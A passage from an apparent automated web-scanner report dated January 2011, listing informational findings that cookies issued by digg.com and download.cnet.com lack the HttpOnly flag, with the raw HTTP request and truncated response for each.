Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.48. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

11.49. http://download.cnet.com/1770-20_4-0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /1770-20_4-0.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1770-20_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: nb
Expires: Wed, 12 Jan 2011 13:01:01 GMT
Edge-Control: max-age=300
Age: 313
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 39010

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Search -
...[SNIP]...

11.50. http://download.cnet.com/8300-2007_4-12.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8300-2007_4-12.xml HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:20 GMT
Edge-Control: max-age=360
Age: 115
Content-Type: text/xml;charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 55525

<?xml version="1.0" encoding="UTF-8"?>


<!-- young tee -->


<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<link>http://download.cnet
...[SNIP]...

11.51. http://download.cnet.com/8301-2007_4-20015771-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20015771-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:19 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:00:36 GMT
Edge-Control: max-age=360
Age: 404
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:19 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:24 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 76026

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Trend Micro bets on the cloud | The Download Blog - Downl
...[SNIP]...

11.52. http://download.cnet.com/8301-2007_4-20027809-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:47 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:47 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:34:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:34:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 69379

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Android lands cloud security from Trend Micro | The Downl
...[SNIP]...

11.53. http://download.cnet.com/8301-2007_4-20027809-12.html--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html-- HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:24 GMT
Via: HTTP/1.0 phx1-rb-dl-app7.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:24 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:24 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:29 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 75826

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Android lands cloud se
...[SNIP]...

11.54. http://download.cnet.com/8301-2007_4-20027865-12.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027865-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:32 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:32 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:32 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:37 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 64987

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>It's a black-and-white world: iPhone apps of the week | T
...[SNIP]...

11.55. http://download.cnet.com/download-blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /download-blog/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download-blog/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:47 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:05:47 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 104182

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Software news, tips and opinions from Download.com editor
...[SNIP]...

11.56. http://download.cnet.com/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mac/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:49 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:06:58 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 51
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:49 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:54 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 99322

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mac - Fr
...[SNIP]...

11.57. http://download.cnet.com/mobile-downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mobile-downloads/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile-downloads/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:50 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:50 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 78960

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mobile -
...[SNIP]...

11.58. http://download.cnet.com/webware-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /webware-apps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware-apps/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:54 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app8.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
